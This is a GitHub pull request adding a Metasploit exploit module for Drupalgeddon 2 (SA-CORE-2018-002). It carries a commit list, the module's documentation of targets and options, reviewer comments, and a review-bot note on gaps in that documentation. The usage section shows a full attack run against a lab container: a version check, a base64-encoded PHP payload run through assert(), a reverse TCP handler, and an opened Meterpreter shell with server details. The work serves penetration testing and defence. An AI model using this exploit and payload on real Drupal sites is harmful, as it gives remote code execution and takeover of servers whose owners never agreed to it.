Add Drupal Drupalgeddon 2 #9876

Merged: 26 commits, Apr 25, 2018
Changes from 15 commits

Commits (26)
d8508b8
Add Drupal Drupalgeddon 2
wvu Apr 13, 2018
1900aa2
Refactor module and address review comments
wvu Apr 17, 2018
86ffbc7
Refactor clean URL handling and remove dead code
wvu Apr 18, 2018
3d116d7
Add version detection and automatic targeting
wvu Apr 19, 2018
7a2cc99
Refactor once more with feeling
wvu Apr 19, 2018
2670d06
Add in-memory PHP execution using assert()
wvu Apr 19, 2018
62aca93
Cache version detection and print only once
wvu Apr 19, 2018
fcfe927
Add PHP dropper functionality and targets
wvu Apr 19, 2018
5be4526
Merge remote-tracking branch 'upstream/master' into feature/drupal
wvu Apr 20, 2018
8be58d3
Stop being lazy about badchar analysis
wvu Apr 21, 2018
c8b6482
Rewrite PHP targets to work with 7.x and 8.x
wvu Apr 24, 2018
2abfee8
Add module doc to appease the @h00die god
wvu Apr 24, 2018
b507391
Change back to vprint_status for the nth time
wvu Apr 24, 2018
cd48616
Explain available targets in documentation
wvu Apr 24, 2018
cfaca5b
Restore a return lost in the refactor :(
wvu Apr 24, 2018
8ff4407
Clarify version detection error message
wvu Apr 25, 2018
89c95ca
Remove block quote and add version to sample run
wvu Apr 25, 2018
e03ebf9
Don't make a header out of tested version
wvu Apr 25, 2018
8bc1417
Use PHP_FUNC as a fallback in case assert() fails
wvu Apr 25, 2018
2ff0e59
Add SA-CORE-2018-002 as an AKA ref
wvu Apr 25, 2018
ec43801
Add check for patch level in CHANGELOG.txt
wvu Apr 25, 2018
b7ac160
Correct comment about PHP CLI (it's not our last!)
wvu Apr 25, 2018
910e933
Use print_good for patch level check, oops
wvu Apr 25, 2018
675ed78
Update module doc with patch level detection
wvu Apr 25, 2018
b8eb7f2
Set target type instead of regexing names
wvu Apr 25, 2018
644889a
Add TurnKey Linux ISOs to module doc setup section
wvu Apr 25, 2018
101 changes: 101 additions & 0 deletions documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -0,0 +1,101 @@
## Intro

> This module exploits a Drupal property injection in the Forms API.
Contributor

remove >

Contributor Author

That was my smartass quoting the module description. :P

> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
> vulnerable.

## Setup

Use the provided Docker images here: <https://hub.docker.com/_/drupal/>.

Tested on the 7.57 and 8.4.5 tags (versions).

## Targets

```
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)
```

Automatic targeting means the Drupal version will be detected first.
Targets with a specific version will do as they're told (regardless of
what the server is running).

Dropper targets write to disk. In-memory targets don't. Be mindful of
showing up in someone's process list, though. A dropper might be more
viable in that regard.

## Options

**TARGETURI**

Set this to the remote path of the vulnerable Drupal install. Defaults
to `/` for the web root.

**PHP_FUNC**

Set this to the PHP function you'd like to execute. Defaults to
`passthru`.

**DUMP_OUTPUT**

Enable this if you'd like to see HTTP responses, including command
output. Defaults to `false` unless `cmd/unix/generic` is your payload.

**VERBOSE**

Enable this to show what function and command were executed. Defaults to
`false` due to the sometimes excessive output.

**ForceExploit**

Enable this to force exploitation regardless of the check result.
Defaults to `false`, meaning the check result is respected.

**WritableDir**

Set this to a writable directory without `noexec` for binary payloads.
Defaults to the current working directory (usually the webapp root).

## Usage

```
Contributor

can you add a h3 here with the exact drupal version thats being tested? Most likely ### Drupal 7.57 on docker image

Contributor Author

Sure thing!

Contributor Author

I dropped the header, since it stuck out too proudly. I've written in the tested version instead. Thoughts?

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3
rhost => 172.17.0.3
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true
verbose => true
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://172.17.0.3/
[*] Executing with printf(): mGE9am2CAHbvmGg
[+] 172.17.0.3:80 The target is vulnerable.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Drupal 7.x targeted at http://172.17.0.3/
[*] Executing with printf(): HmsPV8tYlEbF
[*] Executing with assert(): eval(base64_decode(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.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
[*] Sending stage (37775 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : b3a405d5568a
OS : [redacted]
Meterpreter : php/linux
meterpreter >
```
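Review bot: The PHP_FUNC entry under Options ("Set this to the PHP function you'd like to execute. Defaults to `passthru`.") does not match the sample run in Usage, where the check executes with printf() and the exploit stage executes with assert(); a reader cannot tell from this doc when PHP_FUNC is actually used. Suggest one sentence in the PHP_FUNC entry tying it to the sample run, along the lines of "The check uses printf() and the in-memory PHP targets use assert(); PHP_FUNC is the fallback when assert() fails" (matching commit 8bc1417 "Use PHP_FUNC as a fallback in case assert() fails"). The Targets section has the same gap for failure behaviour: it says automatic targeting detects the Drupal version first but not what the module does when detection fails, which commit 8ff4407 ("Clarify version detection error message") indicates is an error rather than a silent fallback; a sentence stating that would let users know to pick a versioned target in that case.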